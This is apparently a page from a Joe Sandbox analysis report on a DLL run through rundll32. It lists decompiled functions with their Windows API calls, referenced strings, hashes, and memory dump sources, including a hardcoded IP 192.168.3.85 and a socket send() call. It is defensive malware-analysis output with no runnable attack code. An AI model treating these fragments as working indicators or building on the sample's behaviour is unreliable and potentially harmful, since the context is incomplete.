Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 2731880238-0
Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2

GetWindowLongA.USER32(?,000000F0), ref: 1001295E
SetWindowLongA.USER32 ref: 10012989

Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A

Strings

Message, xrefs: 10012995
192.168.3.85, xrefs: 100129B9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: LongMenuWindow$AppendSystem
String ID: 192.168.3.85$Message
API String ID: 4121476972-856608562
Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9

Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03

_DebugHeapAllocator.LIBCPMTD ref: 100130B2

Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875

_strcat.LIBCMT ref: 1001310A

Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB

send.WS2_32(?,?,00000064,00000000), ref: 10013195

Strings

: , xrefs: 100130C7

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
String ID: :
API String ID: 16450322-3653984579
Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1

Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
FreeLibrary.KERNEL32(?), ref: 1001C1F4

Strings

hhctrl.ocx, xrefs: 1001C1C8
HtmlHelpA, xrefs: 1001C1DE

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 3274081130-63838506
Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26

Uniqueness

Uniqueness Score: -1.00%

Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16

Strings

KERNEL32, xrefs: 1003CB01
IsProcessorFeaturePresent, xrefs: 1003CB10

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356

Uniqueness

Uniqueness Score: -1.00%

Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100026FF
SetLastError.KERNEL32(0000007F), ref: 1000272B

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10028651
CoTaskMemAlloc.OLE32(?), ref: 1002876F
_memset.LIBCMT ref: 10028791
CoTaskMemFree.OLE32(?), ref: 1002896D

Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100294EB
VariantClear.OLEAUT32(?), ref: 100295AF
CoTaskMemFree.OLE32(?), ref: 1002965C
CoTaskMemFree.OLE32(?), ref: 1002966A

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 1002913F
GetDesktopWindow.USER32 ref: 1002914F
GetWindowRect.USER32 ref: 10029168
GetWindowRect.USER32 ref: 10029174

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1002C6E7

Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA

GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
GetFileSize.KERNEL32(?,00000000), ref: 1002C733

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 1001E296
SendMessageA.USER32 ref: 1001E2FB
SendMessageA.USER32 ref: 1001E340
SendMessageA.USER32 ref: 1001E369

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
__isleadbyte_l.LIBCMT ref: 1003E1C5
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10026510

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

GetDC.USER32(?), ref: 1002658E
IntersectRect.USER32(?,?,?), ref: 100265C8
CreateRectRgnIndirect.GDI32(?), ref: 100265D2

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
String ID:
API String ID: 3511876931-0
Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 1002127F
__msize.LIBCMT ref: 100212A2
_malloc.LIBCMT ref: 100212BA
_malloc.LIBCMT ref: 100212CF

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1002EB3E
PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10

Uniqueness

Uniqueness Score: -1.00%

Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 100160AF

Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2

SetEvent.KERNEL32(?,00000060), ref: 1001615C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
CloseHandle.KERNEL32(?), ref: 1001616C

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
String ID:
API String ID: 1532457625-0
Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

CharNextA.USER32(?), ref: 10022C6D

Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99

CharNextA.USER32(00000000), ref: 10022C8A
_strtol.LIBCMT ref: 10022CB5
_strtoul.LIBCMT ref: 10022CBC

Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32 ref: 10027B4F
CoTaskMemFree.OLE32(?), ref: 10027BD2

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

